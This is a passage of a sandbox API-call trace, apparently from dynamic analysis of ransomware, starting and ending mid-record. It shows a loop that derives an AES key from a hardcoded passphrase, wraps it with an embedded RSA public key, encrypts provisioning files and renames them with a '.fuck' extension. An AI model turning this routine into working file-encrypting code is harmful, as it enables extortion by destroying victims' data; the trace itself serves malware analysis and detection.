dwFileAttributes=0x0) returned 0 [0237.723] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.724] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.724] CryptDestroyHash (hHash=0x2845ea0) returned 1 [0237.724] CryptDestroyKey (hKey=0x2846620) returned 1 [0237.724] CryptReleaseContext (hProv=0x28581e8, dwFlags=0x0) returned 1 [0237.724] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.724] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.724] GetLastError () returned 0x5 [0237.724] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.724] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.724] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.725] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.725] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.725] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2858d10) returned 1 [0237.727] CryptCreateHash (in: hProv=0x2858d10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.727] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.727] CryptHashData (hHash=0x28468a0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.727] CryptDeriveKey (in: hProv=0x2858d10, Algid=0x6610, hBaseData=0x28468a0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846c20) returned 1 [0237.728] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.728] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.728] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2858af0) returned 1 [0237.728] CryptImportPublicKeyInfo (in: hCryptProv=0x2858af0, dwCertEncodingType=0x1, pInfo=0x284f9a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f9d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f9e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2846a60) returned 1 [0237.729] CryptEncrypt (in: hKey=0x2846a60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.729] CryptEncrypt (in: hKey=0x2846a60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28580d8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28580d8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.729] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28580d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.729] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x276d6a0, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.729] CryptEncrypt (in: hKey=0x2846c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276d6a0*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x276d6a0*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.729] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.729] CloseHandle (hObject=0xffffffff) returned 1 [0237.729] CloseHandle (hObject=0xffffffff) returned 1 [0237.729] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.729] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.730] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.730] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.730] CryptDestroyHash (hHash=0x28468a0) returned 1 [0237.730] CryptDestroyKey (hKey=0x2846c20) returned 1 [0237.730] CryptReleaseContext (hProv=0x2858d10, dwFlags=0x0) returned 1 [0237.730] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.730] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.732] GetLastError () returned 0x5 [0237.732] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml")) returned 0x20 [0237.733] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x80) returned 0 [0237.733] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.733] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.734] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.734] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2858c00) returned 1 [0237.736] CryptCreateHash (in: hProv=0x2858c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.736] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.736] CryptHashData (hHash=0x28466e0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.736] CryptDeriveKey (in: hProv=0x2858c00, Algid=0x6610, hBaseData=0x28466e0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846aa0) returned 1 [0237.737] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.737] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.737] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2858628) returned 1 [0237.737] CryptImportPublicKeyInfo (in: hCryptProv=0x2858628, dwCertEncodingType=0x1, pInfo=0x284fa78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284faa8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284fab0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2846b60) returned 1 [0237.737] CryptEncrypt (in: hKey=0x2846b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.737] CryptEncrypt (in: hKey=0x2846b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857eb8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2857eb8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.737] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857eb8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.738] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2860988, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.738] CryptEncrypt (in: hKey=0x2846aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.738] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.738] CloseHandle (hObject=0xffffffff) returned 1 [0237.738] CloseHandle (hObject=0xffffffff) returned 1 [0237.738] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml"), bFailIfExists=0) returned 0 [0237.738] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x0) returned 0 [0237.738] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.gsg")) returned 0 [0237.739] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.fuck")) returned 0 [0237.739] CryptDestroyHash (hHash=0x28466e0) returned 1 [0237.739] CryptDestroyKey (hKey=0x2846aa0) returned 1 [0237.739] CryptReleaseContext (hProv=0x2858c00, dwFlags=0x0) returned 1 [0237.739] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.739] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.739] GetLastError () returned 0x5 [0237.739] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml")) returned 0x20 [0237.740] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml", dwFileAttributes=0x80) returned 0 [0237.740] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.740] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.740] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.741] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2858270) returned 1 [0237.743] CryptCreateHash (in: hProv=0x2858270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.743] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.743] CryptHashData (hHash=0x28465a0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.743] CryptDeriveKey (in: hProv=0x2858270, Algid=0x6610, hBaseData=0x28465a0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846be0) returned 1 [0237.743] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.743] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.743] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28586b0) returned 1 [0237.744] CryptImportPublicKeyInfo (in: hCryptProv=0x28586b0, dwCertEncodingType=0x1, pInfo=0x284fb48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284fb78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284fb80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2846b20) returned 1 [0237.744] CryptEncrypt (in: hKey=0x2846b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.744] CryptEncrypt (in: hKey=0x2846b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858738*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2858738*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.744] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858738, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.744] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2860988, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.744] CryptEncrypt (in: hKey=0x2846be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.744] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.744] CloseHandle (hObject=0xffffffff) returned 1 [0237.744] CloseHandle (hObject=0xffffffff) returned 1 [0237.744] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml"), bFailIfExists=0) returned 0 [0237.745] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml", dwFileAttributes=0x0) returned 0 [0237.745] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.gsg")) returned 0 [0237.746] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.fuck")) returned 0 [0237.746] CryptDestroyHash (hHash=0x28465a0) returned 1 [0237.746] CryptDestroyKey (hKey=0x2846be0) returned 1 [0237.746] CryptReleaseContext (hProv=0x2858270, dwFlags=0x0) returned 1 [0237.746] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.746] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.746] GetLastError () returned 0x5 [0237.746] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml")) returned 0x20 [0237.746] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml", dwFileAttributes=0x80) returned 0 [0237.747] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.747] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 